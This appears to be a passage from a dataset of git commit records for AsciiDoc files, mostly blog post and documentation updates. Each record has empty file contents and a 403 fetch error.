promise-sequence\u3092\u79fb\u52d5\n","repos":"xifeiwu\/promises-book,lidasong2014\/promises-book,xifeiwu\/promises-book,wenber\/promises-book,wenber\/promises-book,liubin\/promises-book,cqricky\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,azu\/promises-book,tangjinzhou\/promises-book,oToUC\/promises-book,dieface\/promises-book,sunfurong\/promise,liubin\/promises-book,wangwei1237\/promises-book,mzbac\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,oToUC\/promises-book,wenber\/promises-book,azu\/promises-book,tangjinzhou\/promises-book,wangwei1237\/promises-book,mzbac\/promises-book,sunfurong\/promise,xifeiwu\/promises-book,purepennons\/promises-book,dieface\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,cqricky\/promises-book,charlenopires\/promises-book,genie88\/promises-book,oToUC\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,liubin\/promises-book,genie88\/promises-book,lidasong2014\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,genie88\/promises-book,purepennons\/promises-book,azu\/promises-book,liyunsheng\/promises-book,cqricky\/promises-book,charlenopires\/promises-book,liyunsheng\/promises-book","old_file":"Ch4_AdvancedPromises\/readme.adoc","new_file":"Ch4_AdvancedPromises\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"514c079c534a02960bfff54e37e13aba902a1a06","subject":"Update 2017-04-23-Portable-PostgreSQL-distribution-for-Windows.adoc","message":"Update 2017-04-23-Portable-PostgreSQL-distribution-for-Windows.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2017-04-23-Portable-PostgreSQL-distribution-for-Windows.adoc","new_file":"_posts\/2017-04-23-Portable-PostgreSQL-distribution-for-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2785579dd776f13a3961c4a2e7af1fb17f0121b","subject":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e9f56775b27b3dfdc6566ca39483bd2cd74811b","subject":"Update 2016-03-31-Decompile-me-basic.adoc","message":"Update 2016-03-31-Decompile-me-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Decompile-me-basic.adoc","new_file":"_posts\/2016-03-31-Decompile-me-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e8fe2bf4b5b8920a5bd78a509462b5c60b90d87","subject":"Update 2015-12-03-Knee-Pain-and-Shoes.adoc","message":"Update 2015-12-03-Knee-Pain-and-Shoes.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-03-Knee-Pain-and-Shoes.adoc","new_file":"_posts\/2015-12-03-Knee-Pain-and-Shoes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d97f9fc59cb29120280eaa0a4a0bc413b7d5aca","subject":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","message":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aade3edd75e535d2bce19dbec0e219bdb8d144d0","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f049a0523b3be074df60ec903bff98e929754b0f","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af50834bee767ce03159f25293416bbbae3e3666","subject":"Update 2015-10-06-First-post-Lets-start.adoc","message":"Update 2015-10-06-First-post-Lets-start.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-06-First-post-Lets-start.adoc","new_file":"_posts\/2015-10-06-First-post-Lets-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3614c64cd723d19c8266dbfac4e8d6049bfe1c4b","subject":"Update 2015-10-29-This-is-my-first-post.adoc","message":"Update 2015-10-29-This-is-my-first-post.adoc","repos":"gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io","old_file":"_posts\/2015-10-29-This-is-my-first-post.adoc","new_file":"_posts\/2015-10-29-This-is-my-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gruenberg\/gruenberg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cb35e35481e38842f44d0e610a8d08d02f1249d","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea0b0ab6146239dece4f1882821c96437aa7de2e","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"940f2318910e1174fa228e4aba9573a25779ad11","subject":"Update 2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","message":"Update 2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","new_file":"_posts\/2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"707ef5ba93112a4a109c1500481145d91205ce11","subject":"y2b create post 4 Unique Gadgets You Didn't Know Existed...","message":"y2b create post 4 Unique Gadgets You Didn't Know Existed...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-30-4-Unique-Gadgets-You-Didnt-Know-Existed.adoc","new_file":"_posts\/2017-12-30-4-Unique-Gadgets-You-Didnt-Know-Existed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36edfd9ba288d25265675fa87cd074da279c15fc","subject":"Update 2017-02-24-Chrome-Extension.adoc","message":"Update 2017-02-24-Chrome-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Chrome-Extension.adoc","new_file":"_posts\/2017-02-24-Chrome-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1a48913c4a1321ef33bf4333db3655f0ba5e001","subject":"Update 2016-02-15-Pomodoro-and-happiness-in-developer-life.adoc","message":"Update 2016-02-15-Pomodoro-and-happiness-in-developer-life.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-02-15-Pomodoro-and-happiness-in-developer-life.adoc","new_file":"_posts\/2016-02-15-Pomodoro-and-happiness-in-developer-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe68c5aabb80ea25af5dfed697531f50657a2380","subject":"create post It Has Double The Battery of iPhone X","message":"create post It Has Double The Battery of iPhone X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-It-Has-Double-The-Battery-of-iPhone-X.adoc","new_file":"_posts\/2018-02-26-It-Has-Double-The-Battery-of-iPhone-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d37a13b1ead032689be7c6c614a4ebf874fae5bb","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4d41cf35564c0a35d0358b471afaf66852f242d","subject":"Update 2019-01-31-Java.adoc","message":"Update 2019-01-31-Java.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-Java.adoc","new_file":"_posts\/2019-01-31-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f73baeec039cef14d78408603d209ef567bffc0f","subject":"Update YubiKey_and_FreeRADIUS_via_PAM.adoc","message":"Update YubiKey_and_FreeRADIUS_via_PAM.adoc","repos":"Yubico\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam","old_file":"doc\/YubiKey_and_FreeRADIUS_via_PAM.adoc","new_file":"doc\/YubiKey_and_FreeRADIUS_via_PAM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"15983647563b4e871f8503c1e1420ce9ca7f200c","subject":"Update 2016-03-31-Decompile-me-basic.adoc","message":"Update 2016-03-31-Decompile-me-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Decompile-me-basic.adoc","new_file":"_posts\/2016-03-31-Decompile-me-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d7f4327faff079b0a958ff5aac54c993dfcc3f2","subject":"Update 2015-07-12-Meet-the-Team-Anjali.adoc","message":"Update 2015-07-12-Meet-the-Team-Anjali.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-07-12-Meet-the-Team-Anjali.adoc","new_file":"_posts\/2015-07-12-Meet-the-Team-Anjali.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f052d1b8cae9205e3f92a87f43fca329cfcde69","subject":"Add CDI Injection link from master doc","message":"Add CDI Injection link from master doc\n","repos":"mstahv\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,asashour\/framework,asashour\/framework,asashour\/framework,mstahv\/framework","old_file":"documentation\/articles\/VaadinCDI.asciidoc","new_file":"documentation\/articles\/VaadinCDI.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4249cceee9ee8bf7f7a55116c1abe543d571dd9f","subject":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","message":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2765a0be04a8138c9fd8ec377b6bf9fcfada0e1d","subject":"y2b create post I've Never Tried Anything Like It...","message":"y2b create post I've Never Tried Anything Like It...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-14-I've%20Never%20Tried%20Anything%20Like%20It....adoc","new_file":"_posts\/2018-02-14-I've%20Never%20Tried%20Anything%20Like%20It....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7d1f39dadd9c8bb76359169243c13b2073bc6c0","subject":"[docs] KUDU-2107 Document how to add reviewers","message":"[docs] KUDU-2107 Document how to add reviewers\n\nThe contribution guidelines didn't mention how to add reviewers to\ngerrit. This patch documents this process and also adds a tip about how\nto find possible reviewers for a patch\n\nChange-Id: I102e5062d1c31828ad1246b021abcede9b4a88f5\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/10501\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"16dcc4c0812b79367c0d08fbe07957e7479ea533","subject":"y2b create post The Tiniest Mouse","message":"y2b create post The Tiniest Mouse","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-03-The-Tiniest-Mouse.adoc","new_file":"_posts\/2016-05-03-The-Tiniest-Mouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92fd0a9bc4c87acd1b3d6d373d4912bc431a9bcb","subject":"2.8.0.Final release notes","message":"2.8.0.Final release notes\n","repos":"addonis1990\/docs,agoncal\/docs,luiz158\/docs,forge\/docs,agoncal\/docs,forge\/docs,addonis1990\/docs,luiz158\/docs","old_file":"news\/2014-08-18-forge-2.8.0.final.asciidoc","new_file":"news\/2014-08-18-forge-2.8.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"39a66a0178a9f2767b49a79b5d916f1aaa30c5fa","subject":"Add 2017-07-25-forge-3.7.2.final.asciidoc","message":"Add 2017-07-25-forge-3.7.2.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-07-25-forge-3.7.2.final.asciidoc","new_file":"news\/2017-07-25-forge-3.7.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e6a9b1be84033c6f4f7d0a90c5be84eb022602e6","subject":"Update 2019-04-07-IPSEC-S2S-From-Azure-Stack-to-Mikrotik.adoc","message":"Update 2019-04-07-IPSEC-S2S-From-Azure-Stack-to-Mikrotik.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2019-04-07-IPSEC-S2S-From-Azure-Stack-to-Mikrotik.adoc","new_file":"_posts\/2019-04-07-IPSEC-S2S-From-Azure-Stack-to-Mikrotik.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07971b739edf562807e3e73276b2be7e6bdba070","subject":"doc\/users-guide: add cryptographic services section","message":"doc\/users-guide: add cryptographic services section\n\nSigned-off-by: Alexandru Badicioiu <8a25790fe5116c87e16a6a1a1bf0a665f5e1eff8@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"kalray\/odp-mppa,erachmi\/odp,kalray\/odp-mppa,rsalveti\/odp,nmorey\/odp,kalray\/odp-mppa,nmorey\/odp,erachmi\/odp,ravineet-singh\/odp,ravineet-singh\/odp,rsalveti\/odp,dkrot\/odp,erachmi\/odp,dkrot\/odp,kalray\/odp-mppa,erachmi\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,rsalveti\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,kalray\/odp-mppa,rsalveti\/odp,ravineet-singh\/odp,kalray\/odp-mppa,mike-holmes-linaro\/odp,nmorey\/odp,dkrot\/odp,kalray\/odp-mppa,nmorey\/odp,dkrot\/odp,rsalveti\/odp","old_file":"doc\/users-guide\/users-guide.adoc","new_file":"doc\/users-guide\/users-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b3a7f25404c96c31a07706b1e69953fb68ea46d2","subject":"Fixed official api name in docs","message":"Fixed official api name in docs\n","repos":"jango2015\/elasticsearch,btiernay\/elasticsearch,fred84\/elasticsearch,sposam\/elasticsearch,kubum\/elasticsearch,nellicus\/elasticsearch,kingaj\/elasticsearch,EasonYi\/elasticsearch,dongjoon-hyun\/elasticsearch,markllama\/elasticsearch,HarishAtGitHub\/elasticsearch,ImpressTV\/elasticsearch,kaneshin\/elasticsearch,sdauletau\/elasticsearch,socialrank\/elasticsearch,lmtwga\/elasticsearch,mikemccand\/elasticsearch,sc0ttkclark\/elasticsearch,Brijeshrpatel9\/elasticsearch,tahaemin\/elasticsearch,huanzhong\/elasticsearch,Rygbee\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,gmarz\/elasticsearch,dpursehouse\/elasticsearch,rento19962\/elasticsearch,NBSW\/elasticsearch,sreeramjayan\/elasticsearch,likaiwalkman\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,areek\/elasticsearch,wimvds\/elasticsearch,mute\/elasticsearch,GlenRSmith\/elasticsearch,pablocastro\/elasticsearch,xuzha\/elasticsearch,JervyShi\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,iamjakob\/elasticsearch,mcku\/elasticsearch,wuranbo\/elasticsearch,hirdesh2008\/elasticsearch,geidies\/elasticsearch,gmarz\/elasticsearch,elasticdog\/elasticsearch,Collaborne\/elasticsearch,andrejserafim\/elasticsearch,winstonewert\/elasticsearch,zhiqinghuang\/elasticsearch,adrianbk\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,jango2015\/elasticsearch,MaineC\/elasticsearch,qwerty4030\/elasticsearch,yynil\/elasticsearch,achow\/elasticsearch,HarishAtGitHub\/elasticsearch,rajanm\/elasticsearch,ricardocerq\/elasticsearch,artnowo\/elasticsearch,snikch\/elasticsearch,nazarewk\/elasticsearch,jimczi\/elasticsearch,queirozfcom\/elasticsearch,jeteve\/elasticsearch,btiernay\/elasticsearch,ESamir\/elasticsearch,mm0\/elasticsearch,lzo\/elasticsearch-1,ESamir\/elasticsearch,YosuaMichael\/elasticsearch,wbowling\/elasticsearch,EasonYi\/elasticsearch,masterweb121\/elasticsearch,kimimj\/elasticsearch,yuy168\/elasticsearch,huanzhong\/elasticsearch,hanswang\/elasticsearch,cnfire\/elasticsearch-1,weipinghe\/elasticsearch,dylan8902\/elasticsearch,huanzhong\/elasticsearch,Liziyao\/elasticsearch,kimimj\/elasticsearch,mohit\/elasticsearch,bestwpw\/elasticsearch,mjhennig\/elasticsearch,xuzha\/elasticsearch,wenpos\/elasticsearch,queirozfcom\/elasticsearch,diendt\/elasticsearch,wimvds\/elasticsearch,amit-shar\/elasticsearch,strapdata\/elassandra5-rc,davidvgalbraith\/elasticsearch,spiegela\/elasticsearch,hirdesh2008\/elasticsearch,zeroctu\/elasticsearch,nazarewk\/elasticsearch,caengcjd\/elasticsearch,slavau\/elasticsearch,maddin2016\/elasticsearch,karthikjaps\/elasticsearch,humandb\/elasticsearch,mm0\/elasticsearch,masaruh\/elasticsearch,geidies\/elasticsearch,Uiho\/elasticsearch,drewr\/elasticsearch,humandb\/elasticsearch,Widen\/elasticsearch,vingupta3\/elasticsearch,GlenRSmith\/elasticsearch,naveenhooda2000\/elasticsearch,diendt\/elasticsearch,markllama\/elasticsearch,himanshuag\/elasticsearch,scorpionvicky\/elasticsearch,andrestc\/elasticsearch,Liziyao\/elasticsearch,i-am-Nathan\/elasticsearch,Chhunlong\/elasticsearch,karthikjaps\/elasticsearch,amit-shar\/elasticsearch,njlawton\/elasticsearch,scottsom\/elasticsearch,IanvsPoplicola\/elasticsearch,StefanGor\/elasticsearch,strapdata\/elassandra5-rc,glefloch\/elasticsearch,djschny\/elasticsearch,kimimj\/elasticsearch,beiske\/elasticsearch,gingerwizard\/elasticsearch,diendt\/elasticsearch,clintongormley\/elasticsearch,iantruslove\/elasticsearch,MisterAndersen\/elasticsearch,beiske\/elasticsearch,amit-shar\/elasticsearch,pablocastro\/elasticsearch,ImpressTV\/elasticsearch,caengcjd\/elasticsearch,kenshin233\/elasticsearch,camilojd\/elasticsearch,tkssharma\/elasticsearch,franklanganke\/elasticsearch,hydro2k\/elasticsearch,nellicus\/elasticsearch,camilojd\/elasticsearch,wbowling\/elasticsearch,iamjakob\/elasticsearch,spiegela\/elasticsearch,JervyShi\/elasticsearch,petabytedata\/elasticsearch,tahaemin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,queirozfcom\/elasticsearch,karthikjaps\/elasticsearch,rmuir\/elasticsearch,NBSW\/elasticsearch,Stacey-Gammon\/elasticsearch,wangtuo\/elasticsearch,mortonsykes\/elasticsearch,coding0011\/elasticsearch,vroyer\/elasticassandra,wangtuo\/elasticsearch,strapdata\/elassandra-test,wbowling\/elasticsearch,pozhidaevak\/elasticsearch,hirdesh2008\/elasticsearch,MisterAndersen\/elasticsearch,kubum\/elasticsearch,onegambler\/elasticsearch,dylan8902\/elasticsearch,AndreKR\/elasticsearch,Helen-Zhao\/elasticsearch,henakamaMSFT\/elasticsearch,hirdesh2008\/elasticsearch,tsohil\/elasticsearch,mm0\/elasticsearch,djschny\/elasticsearch,mnylen\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,likaiwalkman\/elasticsearch,ulkas\/elasticsearch,JSCooke\/elasticsearch,scorpionvicky\/elasticsearch,nrkkalyan\/elasticsearch,rhoml\/elasticsearch,yongminxia\/elasticsearch,bestwpw\/elasticsearch,mbrukman\/elasticsearch,drewr\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,pablocastro\/elasticsearch,pablocastro\/elasticsearch,jeteve\/elasticsearch,markllama\/elasticsearch,LewayneNaidoo\/elasticsearch,elasticdog\/elasticsearch,18098924759\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,fekaputra\/elasticsearch,jimhooke